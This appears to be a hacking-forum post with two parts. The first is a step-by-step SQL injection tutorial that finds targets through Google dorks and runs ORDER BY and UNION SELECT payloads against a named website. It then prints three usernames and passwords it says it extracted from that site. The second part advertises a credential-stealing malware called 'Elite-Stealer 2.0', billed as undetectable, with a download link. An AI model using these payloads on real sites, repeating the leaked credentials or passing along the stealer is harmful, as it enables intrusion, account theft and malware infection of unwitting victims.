SQL Injection Complete Tutorial [Website Hacking]


Okay first find a volnuerable website
to get volnerable websites
open google.com
and type one of these dorks


inurl:/index.php?id= 
inurl:/news.php?id=
inurl:/page.php?id=
inurl:/view.php?id=
inurl:/item.php?id=

well there is a huge list of google dorks
you can get these from google
okay

when you type one of the google dork..thousands of sites
will be searched
now open a website and type ' at the end of url
if you get this error



Then the website is vuln and you can try to hack it


okay now that you have this error

now you need to find number of columns

now remove ' and type

order by 1(syntax)
now your url will be like
www.brew-monkey.com/news.php?id=465 order by 1

if you dont get any error then increase number
www.brew-monkey.com/news.php?id=465 order by 2 (no error)
www.brew-monkey.com/news.php?id=465 order by 3 (no error)
www.brew-monkey.com/news.php?id=465 order by 4 (no error)
www.brew-monkey.com/news.php?id=465 order by 5 (no error)

www.brew-monkey.com/news.php?id=465 order by 6
ohh error came here



Unknown column '6' in 'order clause'

so you have this number of columns in this website is 5

now its time to use union all select statement

oka as we know our website has 5 columns
now wee need to find vunl columns

for that use this syntax

www.brew-monkey.com/news.php?id=465 union all select 1,2,3,4,5--

now see the pic 3



here you can clearly see some bold numbers

in this website the number is 3

that mean string column is 3

okay

now lets check the MySql version of the website

to check this you need to replace your url with

www.brew-monkey.com/news.php
?id=465 union all select 1,2,@@version,4,5--

oka now see the pic 4

you can clearly see in this pic that

where the column number was written, now there is some changing and that is the
database version

okay if the number is greater than or = 5 then its good
because its easy to crack
if its below then you the sql injection is blind
(it does not mean that you cant crack the db but we have to guess
the table names and all )
okay
so now as we have checked this
now we gonna crack its db
oka
lets find the tables of this database
oka now replace the url with

www.brew-monkey.com/news.php?id=465 union all select 1,2,table_name,4,5 from information_schema.tables where table_schema=database()

if it does not work then use

www.brew-monkey.com/news.php?id=465 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()

wow see the pic 5 below


we have all its table now

now we have to check its tables and find some table with sensitive information

it may be admin , users , usergroups etc

okay so here im trying to crack this table

cpg131_users

oka so now we need to replace our url with

www.brew-monkey.com/news.php?id=465 union all select 1,2,column_name,4,5 from information_schema.columns where table_name=cpg131_users

install hackbar (adds on of firefox) as i have
now click on sql >mysql>Mysqlchar
and type the table name
then you wil get its value

now the decimal value of cpg131_users is (99, 112, 103, 49, 51, 49, 95, 117, 115, 101, 114, 115)

oka copy it and replace the url with

www.brew-monkey.com/news.php?id=465 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=char(99, 112, 103, 49, 51, 49, 95, 117, 115, 101, 114, 115)

well its working

see pic 6


now we need to fetch data of columns

now in this website
the information is in columns

user_name
user_password

oka to fetch these

replace the url with

http://www.brew-monkey.com/news.php?...cpg131_users--

WoW

we have done it guyz..

there are 3 users in this database

brewmonkey_admin:beavis01 
chris:ob5c3n3,mara:0re0gasm
Kevin:kevinspassword










Elite-Stealer 2.0

Features :


Stealer:
• Mozilla Firefox/Fire FTP 4 - 10
• ICQ
• JDownloader
• MSN
• Google Chrome
• FileZilla
• Pidgin
• Steam Username
• Opera


Misc:
• PHP Send
• FTP Send
• FUD [ Fully Undetectable by Antivirus ]

Download Link :
http://www.mediafire.com/?s947ulclf9g4u01
Unloack File : abmoxes.bdrockz.com

Working snap :: Check How logs ( victims PC information ) Show